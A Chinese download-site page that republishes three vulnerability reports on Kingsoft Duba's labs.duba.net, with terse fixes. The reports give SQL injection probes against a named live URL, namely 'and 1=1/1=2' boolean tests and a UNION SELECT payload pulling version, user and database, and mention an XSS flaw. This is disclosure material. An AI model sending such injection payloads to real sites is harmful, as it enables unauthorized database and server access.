金山毒霸多个sql注入及XSS漏洞和修复

新毒霸垃圾清理 独立版

软件大小： 6.64 MB

更新时间： 2023-10-08 13:58:03

所属分类： 卸载清理

查看详情 直接下载

yesky

标签：

• 金山毒霸
• 卸载清理

  大多数朋友不知道金山毒霸多个sql注入及XSS漏洞和修复，今天小编给大家带来金山毒霸多个sql注入及XSS漏洞和修复可以参考下。

  第一个：

  简要描述：由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限。

  详细说明：//labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2。

  漏洞证明：//labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1。

  //labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2。

  结果明显不同 注入漏洞产生。

  修复方案：过滤变量app。

  第二个：

  简要描述：过滤不严导致存在SQL注入。

  详细说明：过滤不严导致存在SQL注入 有机会拿下服务器权限。

  漏洞证明：//labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9。

  //labs.duba.net/robots.txt。

  未作进一步测试。

  修复方案：过滤参数。

  第三个：

  简要描述：留言处过滤不严 造成跨站漏洞。

  详细说明：留言处过滤不严 造成跨站漏洞。

  漏洞证明：//labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5。